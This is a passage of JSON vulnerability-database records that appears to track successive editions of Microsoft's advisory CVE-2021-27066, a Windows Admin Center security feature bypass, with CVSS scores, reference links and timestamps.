"LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-07-31T06:33:22", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-07-31T06:33:22", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-07-31T06:33:22", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-07-31T06:33:22", "differentElements": ["description"], "edition": 9}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-07-31T08:00:31", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-07-31T08:00:31", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-07-31T08:00:31", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-07-31T08:00:31", "differentElements": ["description"], "edition": 10}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "ae165be3481d358dcbfac63a57d67a93", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-08-01T10:41:43", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-08-01T10:41:43", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-08-01T10:41:43", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-08-01T10:41:43", "differentElements": ["description"], "edition": 11}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-08-01T14:42:19", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-08-01T14:42:19", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-08-01T14:42:19", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-08-01T14:42:19", "differentElements": ["description"], "edition": 12}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "ae165be3481d358dcbfac63a57d67a93", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-08-01T19:09:21", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-08-01T19:09:21", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-08-01T19:09:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-08-01T19:09:21", "differentElements": ["description"], "edition": 13}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-08-02T00:43:38", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-08-02T00:43:38", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-08-02T00:43:38", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-08-02T00:43:38", "differentElements": ["description"], "edition": 14}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "ae165be3481d358dcbfac63a57d67a93", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-08-27T08:52:16", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-08-27T08:52:16", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-08-27T08:52:16", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-08-27T08:52:16", "differentElements": ["description"], "edition": 15}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-08-27T12:12:18", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-08-27T12:12:18", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-08-27T12:12:18", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-08-27T12:12:18", "differentElements": ["description"], "edition": 16}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "ae165be3481d358dcbfac63a57d67a93", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-01T12:45:52", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-08-27T12:12:18", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-08-27T12:12:18", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-01T12:45:52", "differentElements": ["description"], "edition": 17}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-02T02:42:13", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-02T02:42:13", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-02T02:42:13", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-02T02:42:13", "differentElements": ["msAffectedSoftware"], "edition": 18}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-03T18:45:04", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-03T18:45:04", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-03T18:45:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-03T18:45:04", "differentElements": ["msAffectedSoftware"], "edition": 19}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-03T20:41:47", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-03T20:41:47", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-03T20:41:47", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-03T20:41:47", "differentElements": ["msAffectedSoftware"], "edition": 20}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, 